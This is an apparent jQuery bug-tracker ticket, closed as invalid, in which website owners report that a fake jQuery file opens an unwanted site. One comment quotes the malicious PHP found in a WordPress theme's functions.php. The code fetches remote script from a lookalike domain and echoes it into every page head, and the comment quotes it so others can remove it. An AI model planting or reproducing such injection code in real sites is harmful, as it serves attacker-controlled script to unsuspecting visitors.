#12113 closed bug (invalid)
Database jqueryc_db and jquerys.org
Reported by: | Owned by: | ||
---|---|---|---|
Priority: | undecided | Milestone: | None |
Component: | unfiled | Version: | 1.7.2 |
Keywords: | Cc: | ||
Blocked by: | Blocking: |
Description
http://www.jquerys.org/class/jquery-1.6.3.min.js
My website is using your library but, your library opens a website automatically (http://www.watchliveonline.org)
Change History (4)
comment:1 Changed 11 years ago by
Resolution: | → invalid |
---|---|
Status: | new → closed |
Summary: | Can you fix this?? → jquerys.org |
comment:2 Changed 11 years ago by
I tracked this down to an include in my functions.php file within my theme folder, except mine is linking to: http://www.jqueryc.com/jquery-1.6.3.min.js. I tried changing the link to a newer version from the Google API: https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js but it broke my theme. When I changed the link back to: http://www.jqueryc.com/jquery-1.6.3.min.js it seems to have resolved itself - no rhyme or reason for it.
comment:3 Changed 11 years ago by
Summary: | jquerys.org → Database jqueryc_db and jquerys.org |
---|
comment:4 Changed 11 years ago by
Replying to [email protected]…:
http://www.jquerys.org/class/jquery-1.6.3.min.js
My website is using your library but, your library opens a website automatically (http://www.watchliveonline.org)
I had the same problem and it came from malicious script in the functions.php of a wordpress theme. Delete the entire reference to Jquery Function if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){ $url="jqueryc.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $data = curl_exec($ch); curl_close($ch); echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
and it will correct the problem!
It's a virus that happens to have taken our name. We are not involved and cannot help. Please ask for help from your web site admin or on a forum like StackOverflow.